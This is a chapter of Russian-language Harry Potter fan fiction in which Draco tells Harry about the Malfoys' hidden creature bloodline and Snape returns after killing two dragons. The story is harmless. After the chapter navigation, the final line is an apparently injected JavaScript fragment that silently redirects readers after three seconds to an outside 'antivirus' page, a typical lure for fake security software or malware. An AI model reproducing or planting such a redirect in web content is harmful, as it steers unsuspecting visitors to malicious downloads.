- Не просто животным, а могущественным волшебным созданием, в котором живет дикая, чистая магия, как в вивернах, драконах… Кажется, я слышал о семье, в чьих жилах есть кровь тестралов. Если женщина сумеет пережить зачатие и роды, магия животного навсегда сохраняется в семье.

- Но зачем кому-то так поступать?

- Для начала, у Малфоев никогда не рождались сквибы. И наша кровь достаточно сильна, чтобы уберечь нас от вырождения. Если бы некоторые из чистокровных семей, вроде нашей, не имели в своей крови дикой магии, мы бы давно вымерли, как потомки Салазара.

При упоминании Слизерина Гарри заметно напрягся, но ничего о нем не сказал. Вместо этого он задумчиво произнес:

- Рон - чистокровный, но я никогда не видел, чтоб он в кого-нибудь превращался.

- Конечно, нет, - пожал плечами Драко. – Он чистокровный, но не темный маг.  Желание привязать к семье дикую магию - исключительно наша традиция.

- Вот почему тебя могут убить, если кто-то узнает, - кивнул Гарри. – Тогда они наверняка будут знать, что ты темный.

Драко лениво махнул рукой и попытался устроиться поудобнее, придерживая грозящую соскользнуть мантию. Вздохнув, он пожалел, что так рассердил крестного.

- Но все равно это бессмысленно, - нахмурился Гарри. – Если мы… погоди, я не могу и дальше говорить «мы» и «вы». Если ты – темный маг, то как вы называете всех остальных, таких как я? Светлыми?

Раздраженный бесконечными расспросами о том, что он всю жизнь считал само собой разумеющимся, Драко раздраженно фыркнул:

- Нет, мы зовем вас предателями и грязнокровками.

- Ты, капризный, маленький, упертый… ладно, значит мы - светлые, - удовлетворенный гримасой Драко, Гарри продолжал: - Если светлые маги могут становиться анимагами, почему среди них нет полукровок?

- Ты сам видел, как они обращаются с полугигантом, идиот, - отрезал Драко. – И знаешь, как они относятся к кентаврам. Они считают, что быть наполовину виверной ничуть не лучше.

- В этом вы не сильно различаетесь, - фыркнул Гарри. – Ты вечно издеваешься над Хагридом именно потому,  что он полугигант.

- Да, но он сам напрашивается, - ухмыльнулся Драко. – И, что еще лучше, это раздражает тебя.

- Но почему?

- Ты что, думаешь, я оставлю его в покое только потому, что сам полукровка? – усмехнулся слизеринец. – Полукровная солидарность? Для начала, моя кровь гораздо благороднее. Мы породнились с вивернами восемьсот лет назад, а его помесь существует всего одно поколение. И потом, темная магия более древняя, а он оскорбляет нас при каждой возможности. Но это не мешает ему частенько заглядывать в Фальшивое золотишко, чтобы перекинуться в карты.

- Заглядывать… куда?..

- Это казино на Дрянн-аллее. Поттер, неужели с твоей любовью к нарушению правил ты еще там не был? – Драко пожал плечами и поудобнее пристроил голову на подлокотник. Микстура Помфри творила чудеса, но преследование, превращение и нескончаемая дрожь окончательно лишили его сил. Он надеялся поспать до вечера. – Ну, тебе же хуже. Дьявольские наслаждения дадут Сладкому королевству сто очков вперед.

Несколько минут они молчали. Драко удивлялся, почему Поттер не уходит, но после того, как два дракона пытались сделать из замка швейцарский сыр, держать гриффиндорца поблизости казалось хорошей идеей. Теперь Поттер может сказать кому угодно, что звери охотились исключительно за Драко, и нападение не было хитроумной затеей Малфоев, устроенной, чтобы погубить всех. В «Пророке» наверняка появятся гнусные инсинуации о том, что Драко как-то связан с Темным лордом и, возможно, на этот раз Дамблдор не сможет сдержать министерство. И, конечно, целый абзац будет посвящен Гарри, его героическим попыткам спасти школу и даже неблагодарного отпрыска Малфоев.

Драко посмотрел на гриффиндорца, в глубокой задумчивости стоящего у стеклянной стены.

- Поттер?

- Что?

- Там, на лестнице, ты размахивал руками и вопил, как сумасшедший.

- Ничего подобного! Я пытался привлечь внимание дракона, - возразил Гарри.

- Зачем?

Поттер заколебался. Он молчал и молчал, и, похоже, не собирался отвечать.

- Ты все равно не смог бы остановить его в одиночку, - произнес Драко.

- Все говорят, что у меня комплекс героя, - пробормотал Гарри.

- Пф, тоже мне, герой, - фыркнул Драко. – Он даже не взглянул на тебя.

- Эй, я просто не хотел, чтоб он тебя съел, - сказал Гарри. – Ты помогаешь Снейпу с зельями, ты чуть не взорвал Темного лорда, ты учишь меня и Гермиону… да, я знаю, что тебе ужасно не хочется ее учить, но ты все равно это делаешь… Я просто не хотел, чтобы дракон тебя съел, вот и все. Не такое уж большое дело.

Для Мальчика-который-выжил пытаться спасти жизнь Мальчика-который-жил-чтобы-мучить-Поттера, для предателя спасти темного мага, для Гарри Поттера спасти жизнь сына Люциуса Малфоя - это было еще какое большое дело! Не просто большое – подрывающее основы мироздания. Но ничего такого Драко вслух не сказал. Он просто уставился в пол и быстро пробормотал:

- Спасибо, - и, прежде чем Поттер придумал, что на это ответить, отвернулся к спинке дивана и укрылся с головой. – Я хочу немного поспать, - сказал он. – Тебе не обязательно здесь оставаться, можешь возвращаться к друзьям.

- Подожди… - заговорил гриффиндорец, но его перебил звук открывающейся двери. В гостиную стремительно вошел Мастер зелий. Его руки были по локоть в крови, и, подойдя к столу, он вытер их обрывками одежды Драко. Из карманов на стол высыпалось несколько монеток. Северус посмотрел на них и сказал крестнику, не обращая внимания на то, что тот притворяется спящим:

- Завтра можешь вымочить их в драконьей крови. Тогда они будут стоить гораздо дороже.

- Вы убили их? – спросил Гарри, поглядев на темные пятна на руках Мастера зелий.

- Директор прикончил первого, а я – второго. Темный лорд совершил непростительную тактическую ошибку, послав сюда драконов. Теперь наш запас ингредиентов значительно пополнится, и мы сможем приготовить намного больше зелий, - Северус поглядел на Драко, а затем обратился к Гарри. – Здесь ты больше не нужен, и мисс Грейнджер наверняка подозревает, что я скормил тебя дракону. Ступай.

Напоследок бросив на Драко задумчивый взгляд, Гарри поднялся и вышел. Снейп посмотрел ему вслед, и, как только стена захлопнулась, наложил на вход запирающие чары, чтобы, даже зная пароль, никто не мог войти. Еще одно заклинание отперло дверцы на старинном шкафчике возле стены, где обнаружился небольшой бар. Решив, что после сражения с двумя гигантскими ящерами не помешает выпить, Северус немедленно налил себе стаканчик виски.

- Поспи немного, - сказал он Драко, осушив стакан. – Через несколько часов, как только рунические заклятья перестанут действовать, мы начнем разделывать драконов.

- Так вот как они проникли сквозь защитные чары? – спросил юноша, не оборачиваясь.

- Пока директор и МакГонагалл не изучат заклинания, трудно сказать наверняка, но это более чем вероятно, - Снейп снова запер шкафчик и отряхнул мантию. Ее подпалило, но времени переодеться не было. Еще много нужно было сделать в поврежденном замке. – Мои поздравления, что ты уцелел, - спустя мгновение произнес он. – Не думаю, что я смог бы встретить Люциуса с твоим пеплом в баночке и извинениями.

Драко закрыл глаза и вздохнул.

- Прости.

- За что? – спросил Северус. – За то, что ты чуть не позволил им поджарить себя? За то, что спрятался от своего наставника? Или за то, что позволил Поттеру узнать тайну Малфоев?

- Нет... я извиняюсь перед своими детьми, если они у меня когда-нибудь будут, - сказал Драко. – Им придется увидеть все это в кошмарах.

Уже шагнувший к выходу Северус помедлил и обернулся.

- Ты же знаешь, что это не просто кошмары, - мягко произнес он. – Это воспоминания.

Да, Драко знал – воспоминания, передающиеся через кровь. Мать объясняла ему, что странные люди из его снов и ужасные вещи, которые с ними происходят, вовсе не результат чтения страшных сказок на ночь.

- Я знаю, - ответил он. – И оттого они только хуже.

Предыдущая глава   Оглавление   Следующая глава

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>